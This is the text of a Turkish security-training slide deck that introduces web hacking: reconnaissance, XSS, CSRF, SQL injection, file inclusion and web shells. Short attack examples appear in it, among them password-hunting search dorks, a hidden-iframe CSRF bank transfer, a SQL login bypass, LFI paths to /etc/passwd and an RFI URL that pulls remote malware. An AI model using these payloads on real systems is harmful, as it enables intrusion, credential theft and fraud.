Web Uygulamaları ve Hacking Yöntemleri
description
Transcript of Web Uygulamaları ve Hacking Yöntemleri
![Page 1: Web Uygulamaları ve Hacking Yöntemleri](https://reader033.fdocuments.net/reader033/viewer/2022061516/568160b6550346895dcfd9ba/html5/thumbnails/1.jpg)
Web Uygulamaları ve Hacking Yöntemleri
Twitter.com/EPICROUTERSFacebook.com/EPICROUTERSS
Eyüp ÇELİKSiber Güvenlik Danışmanı
[email protected]://www.eyupcelik.com.tr
![Page 2: Web Uygulamaları ve Hacking Yöntemleri](https://reader033.fdocuments.net/reader033/viewer/2022061516/568160b6550346895dcfd9ba/html5/thumbnails/2.jpg)
• Siber Güvenlik Danışmanı (EntPro Bilişim ve Danışmanlık)
• White Hat Hacker• Ethical Hacking Eğitmeni• Blog Yazarı (www.eyupcelik.com.tr)• SecWis Güvenlik Birim Yöneticisi (www.secwis.com)• LabSec Community - Güvenlik Ekip Lideri• Anatolia Security - Proje Takım Lideri• Güvenlik Araştırmacısı (Security Research)
– PacketStormSecurity.org– Exploit-db.com– Secunia.com
Eyüp ÇELİK Kimdir?
![Page 3: Web Uygulamaları ve Hacking Yöntemleri](https://reader033.fdocuments.net/reader033/viewer/2022061516/568160b6550346895dcfd9ba/html5/thumbnails/3.jpg)
• Web Uygulamaları ve Hacking Yöntemleri• Bilgi Toplama
• Web Sunucusu, Uygulama, Yazılım Dili, Versiyon Keşfi• Hata Mesajlarından Bilgi Toplama• Arama Motorlarından Bilgi Toplama• Alt Dizin ve Admin Panel Keşfi
• Web Güvenlik Testlerinde Kişisel Proxyler• XSS, CSRF Açıkları ve Kötüye Kullanımı
• XSS, CSRF Nedir?• XSS, CSRF Kullanımı
• SQL Injection Zafiyetleri ve Hacking Amaçlı Kullanımları• SQL Injection ve Blind SQL Injection Nedir?• SQL – Blind SQL Kullanımı• SQL Injection Örnekleri• Arama Motorlarından Zafiyet Arama• Havij, Sqlmap, SQL Finder, Pangolin
• File Inclusion Zafiyetleri ve Hacking Amaçlı Kullanımları• Local File Inclusion (LFI)• Remote File Inclusion (RFI)
• Web Shell• Web Shell Kavramları ve Kullanım Amaçları• PHP, ASP, JSP, ASP.NET Shell Çeşitleri
Ajanda
![Page 4: Web Uygulamaları ve Hacking Yöntemleri](https://reader033.fdocuments.net/reader033/viewer/2022061516/568160b6550346895dcfd9ba/html5/thumbnails/4.jpg)
Whois
![Page 5: Web Uygulamaları ve Hacking Yöntemleri](https://reader033.fdocuments.net/reader033/viewer/2022061516/568160b6550346895dcfd9ba/html5/thumbnails/5.jpg)
DNS Record
![Page 6: Web Uygulamaları ve Hacking Yöntemleri](https://reader033.fdocuments.net/reader033/viewer/2022061516/568160b6550346895dcfd9ba/html5/thumbnails/6.jpg)
Maltego
![Page 7: Web Uygulamaları ve Hacking Yöntemleri](https://reader033.fdocuments.net/reader033/viewer/2022061516/568160b6550346895dcfd9ba/html5/thumbnails/7.jpg)
Web Sunucusu, Programlama Dili, Portlar
![Page 8: Web Uygulamaları ve Hacking Yöntemleri](https://reader033.fdocuments.net/reader033/viewer/2022061516/568160b6550346895dcfd9ba/html5/thumbnails/8.jpg)
Sık karşılaşılan hata kodları• 400 (Söz dizimi çözülemedi)• 403 (Yasak)• 404 (Bulunamadı)• 405 (Yönteme izin verilmiyor)• 500 (Dahili sunucu hatası)• 505 (HTTP sürümü
desteklenmiyor)
Hata Mesajlarından Bilgi Toplama
![Page 9: Web Uygulamaları ve Hacking Yöntemleri](https://reader033.fdocuments.net/reader033/viewer/2022061516/568160b6550346895dcfd9ba/html5/thumbnails/9.jpg)
• www.archive.org (Web Arşiv)• www.google.com
• site: eyupcelik.com.tr• Filetype:txt• Password 123123 filetype:xml• Password 123123 filetype:xml site:site.com.tr • intitle:index.of• Intitle:index.of site:gov.tr• intitle:index.of pwd.db passwd site:com• Microsoft-IIS/5.0 server at• Apache/2.2 Server at
• www.bing.com• IP: 192.168.1.100
• Kariyer Siteleri • (Kariyer.net, yenibiris.com. SecretCV)
Arama Motorlarından Bilgi Toplama
![Page 10: Web Uygulamaları ve Hacking Yöntemleri](https://reader033.fdocuments.net/reader033/viewer/2022061516/568160b6550346895dcfd9ba/html5/thumbnails/10.jpg)
Google Hacking Database
![Page 11: Web Uygulamaları ve Hacking Yöntemleri](https://reader033.fdocuments.net/reader033/viewer/2022061516/568160b6550346895dcfd9ba/html5/thumbnails/11.jpg)
Alt Dizin ve Admin Panel Keşfi
![Page 12: Web Uygulamaları ve Hacking Yöntemleri](https://reader033.fdocuments.net/reader033/viewer/2022061516/568160b6550346895dcfd9ba/html5/thumbnails/12.jpg)
• Web Hacking Yöntemleri• Bilgi Toplama
• Web Sunucusu, Uygulama, Yazılım Dili, Versiyon Keşfi• Hata Mesajlarından Bilgi Toplama• Arama Motorlarından Bilgi Toplama• Alt Dizin ve Admin Panel Keşfi
• Web Güvenlik Testlerinde Kişisel Proxyler• XSS, CSRF Açıkları ve Kötüye Kullanımı
• XSS, CSRF Nedir?• XSS, CSRF Kullanımı
• SQL Injection Zafiyetleri ve Hacking Amaçlı Kullanımları• SQL Injection ve Blind SQL Injection Nedir?• SQL – Blind SQL Kullanımı• SQL Injection Örnekleri• Arama Motorlarından Zafiyet Arama• Havij, Sqlmap, SQL Finder, Pangolin
• File Inclusion Zafiyetleri ve Hacking Amaçlı Kullanımları• Local File Inclusion (LFI)• Remote File Inclusion (RFI)
• Web Shell• Web Shell Kavramları ve Kullanım Amaçları• PHP, ASP, JSP, ASP.NET Shell Çeşitleri
Ajanda
![Page 13: Web Uygulamaları ve Hacking Yöntemleri](https://reader033.fdocuments.net/reader033/viewer/2022061516/568160b6550346895dcfd9ba/html5/thumbnails/13.jpg)
Kişisel Proxy’ler (OWASP ZAP)
![Page 14: Web Uygulamaları ve Hacking Yöntemleri](https://reader033.fdocuments.net/reader033/viewer/2022061516/568160b6550346895dcfd9ba/html5/thumbnails/14.jpg)
• Sunucuya gönderilen yazılım betiklerinin (script) kullanıcının tarayıcısında çalıştığı bir saldırı türüdür.
• PHP-ASP-ASP.NET Sayfalarında sıklıkla görülür.• Genellikle POST ve GET metotlarının kullanıldığı alanlarda olur. • Yazılım betiklerinin kullanıcı tarafında çalıştırılması sonucunda
oturum bilgileri çalınabilir, bilgisayarına zararlı kodlar enjekte edilebilir ve bilgisayar yönetimi ele geçirilebilir.
• En çok karşılaşılan güvenlik zafiyetidir!
XSS Nedir?
![Page 15: Web Uygulamaları ve Hacking Yöntemleri](https://reader033.fdocuments.net/reader033/viewer/2022061516/568160b6550346895dcfd9ba/html5/thumbnails/15.jpg)
• XSS• Reflected XSS Attack• Stored (Persistent) XSS Attack
XSS Zafiyet Türevleri
![Page 16: Web Uygulamaları ve Hacking Yöntemleri](https://reader033.fdocuments.net/reader033/viewer/2022061516/568160b6550346895dcfd9ba/html5/thumbnails/16.jpg)
• URL adreslerindeki querystringler ve form alanlarında sıklıkla görülür.• En çok karşılaşılan XSS saldırı türevidir.• Kullanıcı taraflı çalışır.• Phishing saldırılarına zemin oluşturur.
Reflected XSS Saldırıları
![Page 17: Web Uygulamaları ve Hacking Yöntemleri](https://reader033.fdocuments.net/reader033/viewer/2022061516/568160b6550346895dcfd9ba/html5/thumbnails/17.jpg)
• Forumlar, ziyaretçi defterleri gibi alanlarda sıklıkla görülür.• XSS kodları database sunucusuna kaydedilir.• Kullanıcılar sayfaya eriştiklerinde XSS kodları çalışır ve amaca hizmet
eder.
Stored (Persistent) XSS Saldırıları
![Page 18: Web Uygulamaları ve Hacking Yöntemleri](https://reader033.fdocuments.net/reader033/viewer/2022061516/568160b6550346895dcfd9ba/html5/thumbnails/18.jpg)
• XSS saldırısına benzer• Web uygulamasının oturum zaman aşımlarını
kullanmamasından kaynaklanır.• XSS saldırılarının aksine CSRF saldırıları kullanıcı bazlıdır.• Bu saldırı türünde, kullanıcının isteği dışında kullanıcıya
işlemler yaptırılır.• Banka hesaplarından para transferi, uygulama yetki
yükseltme saldırıları gibi bir çok işlem bu saldırı yöntemi ile yapılabilmektedir.
• Saldırganın amacı; yetkisi olmayan alanlarda istediği işlemi yetkisi olan bir kullanıcıya yaptırmaktır.
• Örneğin; ING Direct bankasında bulunan CSRF zafiyeti, kullanıcının belirtilen hesaba para transfer etmesini sağlamaktaydı.
CSRF (Cross Site Request Forgery) Saldırısı
![Page 19: Web Uygulamaları ve Hacking Yöntemleri](https://reader033.fdocuments.net/reader033/viewer/2022061516/568160b6550346895dcfd9ba/html5/thumbnails/19.jpg)
• Web sitesinde oturum açan bir kullanıcı, eğer aynı zamanda zararlı kodun bulunduğu sayfaya erişirse, hesabından başka bir hesaba para aktarılıyor
• Kullanıcı uygulamayı açtıktan sonra, zararlı sayfada http://www.banka.com/ParaYollar.php?Gonderen=Eyup&Alici=Ismail&Miktar=500&submit=1 kodu çalıştırılır.
• Bunun için saldırgan yukarıda bulunan kodu sayfasında <img> veya <iframe> tagları arasına yerleştirir.
• Bu tagler kullanıcının görmemesi için <img src=“http://www.banka.com/ParaYollar.php?Gonderen=Eyup&Alici=Ismail&Miktar=500&submit=1” width=“0” height=“0”> şeklinde yada<iframe src=“http://www.banka.com/ParaYollar.php?Gonderen=Eyup&Alici=Ismail&Miktar=500&submit=1” width=“0” height=“0”> şeklinde olacaktır.• Bu kodlar kullanıcı tarafında çalışınca, Eyup adlı kullanıcın
hesabından Ismail adlı kullanıcın hesabına 500 TL aktarmış olacaktır.
CSRF (Cross Site Request Forgery) Saldırısı - Örnek
![Page 20: Web Uygulamaları ve Hacking Yöntemleri](https://reader033.fdocuments.net/reader033/viewer/2022061516/568160b6550346895dcfd9ba/html5/thumbnails/20.jpg)
• Web Hacking Yöntemleri• Bilgi Toplama
• Web Sunucusu, Uygulama, Yazılım Dili, Versiyon Keşfi• Hata Mesajlarından Bilgi Toplama• Arama Motorlarından Bilgi Toplama• Alt Dizin ve Admin Panel Keşfi
• Web Güvenlik Testlerinde Kişisel Proxyler• XSS, CSRF Açıkları ve Kötüye Kullanımı
• XSS, CSRF Nedir?• XSS, CSRF Kullanımı
• SQL Injection Zafiyetleri ve Hacking Amaçlı Kullanımları• SQL Injection ve Blind SQL Injection Nedir?• SQL – Blind SQL Kullanımı• SQL Injection Örnekleri• Arama Motorlarından Zafiyet Arama• Havij, Sqlmap, SQL Finder, Pangolin
• File Inclusion Zafiyetleri ve Hacking Amaçlı Kullanımları• Local File Inclusion (LFI)• Remote File Inclusion (RFI)
• Web Shell• Web Shell Kavramları ve Kullanım Amaçları• PHP, ASP, JSP, ASP.NET Shell Çeşitleri
Ajanda
![Page 21: Web Uygulamaları ve Hacking Yöntemleri](https://reader033.fdocuments.net/reader033/viewer/2022061516/568160b6550346895dcfd9ba/html5/thumbnails/21.jpg)
• Veritabanından sorgulamalar yapılırken, sorgulara bazı karakterlerin (‘) eklenerek yetkisiz sorgulamalar yapılmasıdır.
• SQL injection yöntemi ile sql sunucusunda bulunan verilere erişilebilir, değiştirilebilir , silinebilir
• SQL Injection son zamanlarda en tehlikeli saldırı türlerinden biri haline geldi.
• Web uygulamalarında bulunan SQL sorgularının doğru bir şekilde analiz edilmeden SQL sunucusuna aktarılmasından kaynaklanan bir saldırı türüdü
• SQL’de iki tek tırnak (‘) yan yana gelince arada bulunan kodlar “string” olarak kabul edilir.
• Örneğin; bir userın form alanına giriş yapacağı zaman girmiş olduğu input değerler kontrol edilirken sql cümlecikleri kullanılır.
• SELECT * from kullanicilar where isim=‘eyup’ and sifre=‘x9x9’• Böyle bir durumda, kullanıcılar tablosunda bulunan isim kolonunda
“eyup” varsa ve sifre kolonıundaki şifresi de eğer “x9x9” ise kullanıcı oturum açmış olacaktır.
• Kullanıcının form alanına girmiş olduğu input veriler where koşuluna atanmaktadır.
SQL Injection Nedir?
![Page 22: Web Uygulamaları ve Hacking Yöntemleri](https://reader033.fdocuments.net/reader033/viewer/2022061516/568160b6550346895dcfd9ba/html5/thumbnails/22.jpg)
• Bu mantıkla çalışan bir sitede sql injection saldırısı yapacaksak eğer, bize kullanıcı adı ve şifreyi her zaman döndürecek bir koda ihityacımız olacaktır.
• Select * from kullanicilar where isim=‘’ OR ‘’ = ‘’ and sifre= ‘’ OR ‘’ = ‘’
• Kullanıcılar tablosundaki isim kolonu ve sifre kolonu boş olan kullanıcıları istemiş olduk.
SQL Injection Nedir?
![Page 23: Web Uygulamaları ve Hacking Yöntemleri](https://reader033.fdocuments.net/reader033/viewer/2022061516/568160b6550346895dcfd9ba/html5/thumbnails/23.jpg)
• ODBC (Open Database Connectivity) verikaynakları üzerinde veri taşımaya yarayan bir araçtır.
• Bu işlemi verikaynağı ve uygulama arasında bir katman oluşturarak gerçekleştirir.
• Error Based SQL Injection saldırıları, ODBC’nin verdiği hatalardan faydalanarak verilere erişmeye çalışır.
• Çoğunlukla SQL Union operatöründen faydalanılarak bu hata verilerine erişilir.
Error Based SQL Injection Nedir?
![Page 24: Web Uygulamaları ve Hacking Yöntemleri](https://reader033.fdocuments.net/reader033/viewer/2022061516/568160b6550346895dcfd9ba/html5/thumbnails/24.jpg)
• SQL injectionda kullanılan karakterlerin sonuç vermediği durumlarda kullanılan bir saldırı yöntemidir.
• Bu yöntem alınan hataların True veya False kısmı ile ilgilenir.
• SQL üzerinde yapılan sorgulamaların doğru veya yanlış olduğu sonuçlarını bize geri döndürür.
• Blind SQL Injection ile yapılan yöntemler deneme-yanılma yöntemi ile yapılır.
Blind (Kör) SQL Injection Nedir?
![Page 25: Web Uygulamaları ve Hacking Yöntemleri](https://reader033.fdocuments.net/reader033/viewer/2022061516/568160b6550346895dcfd9ba/html5/thumbnails/25.jpg)
Arama Motorlarından Zafiyet Tarama - 1
![Page 26: Web Uygulamaları ve Hacking Yöntemleri](https://reader033.fdocuments.net/reader033/viewer/2022061516/568160b6550346895dcfd9ba/html5/thumbnails/26.jpg)
Aramam Motorlarindan Zafiyet Tarama - 2
![Page 27: Web Uygulamaları ve Hacking Yöntemleri](https://reader033.fdocuments.net/reader033/viewer/2022061516/568160b6550346895dcfd9ba/html5/thumbnails/27.jpg)
Havij
![Page 28: Web Uygulamaları ve Hacking Yöntemleri](https://reader033.fdocuments.net/reader033/viewer/2022061516/568160b6550346895dcfd9ba/html5/thumbnails/28.jpg)
• Web Hacking Yöntemleri• Bilgi Toplama
• Web Sunucusu, Uygulama, Yazılım Dili, Versiyon Keşfi• Hata Mesajlarından Bilgi Toplama• Arama Motorlarından Bilgi Toplama• Alt Dizin ve Admin Panel Keşfi
• Web Güvenlik Testlerinde Kişisel Proxyler• OWASP Top 10 Açıklık Rehberi• XSS, CSRF Açıkları ve Kötüye Kullanımı
• XSS, CSRF Nedir?• XSS, CSRF Kullanımı
• SQL Injection Zafiyetleri ve Hacking Amaçlı Kullanımları• SQL Injection ve Blind SQL Injection Nedir?• SQL – Blind SQL Kullanımı• SQL Injection Örnekleri• Arama Motorlarından Zafiyet Arama• Havij, Sqlmap, SQL Finder, Pangolin
• File Inclusion Zafiyetleri ve Hacking Amaçlı Kullanımları• Local File Inclusion (LFI)• Remote File Inclusion (RFI)
• Web Shell• Web Shell Kavramları ve Kullanım Amaçları• PHP, ASP, JSP, ASP.NET Shell Çeşitleri
Ajanda
![Page 29: Web Uygulamaları ve Hacking Yöntemleri](https://reader033.fdocuments.net/reader033/viewer/2022061516/568160b6550346895dcfd9ba/html5/thumbnails/29.jpg)
• Web sitesinde bulunan kodlama hatalarından (include, require) meydana gelir
• Sunucuda bulunan dosyaların çağrılmasına ve okunabilmesine olanak verir
• Sadece bulunduğu siteyi değil, sunucuda bulunan tüm siteleri etkileyebilir!
• index.php?SayfaAc=iletisim.php• index.php?SayfaAc=../../configuration.php• index.php?SayfaAc=../../../../etc/passwd• index.php?SayfaAc=../../../boot.ini
Local File Inclusion (LFI)
![Page 30: Web Uygulamaları ve Hacking Yöntemleri](https://reader033.fdocuments.net/reader033/viewer/2022061516/568160b6550346895dcfd9ba/html5/thumbnails/30.jpg)
• Web sitesinde bulunan kodlama hatalarından (include, require) meydana gelir
• RFI saldırılarında en büyük etken değişkene değer atanmamasıdır!
• Tanımlanmış ancak değer atanmamış olan değişkene dışardan değer aktarılması ile oluşur.
• Sadece bulunduğu siteyi değil, sunucuda bulunan tüm siteleri etkileyebilir!
• include($deger”.php”)• index.php?deger=http://www.site.com/malware.txt
Remote File Inclusion (RFI)
![Page 31: Web Uygulamaları ve Hacking Yöntemleri](https://reader033.fdocuments.net/reader033/viewer/2022061516/568160b6550346895dcfd9ba/html5/thumbnails/31.jpg)
Web Shell
![Page 32: Web Uygulamaları ve Hacking Yöntemleri](https://reader033.fdocuments.net/reader033/viewer/2022061516/568160b6550346895dcfd9ba/html5/thumbnails/32.jpg)
Teşekkürler Sorular?
Sonuç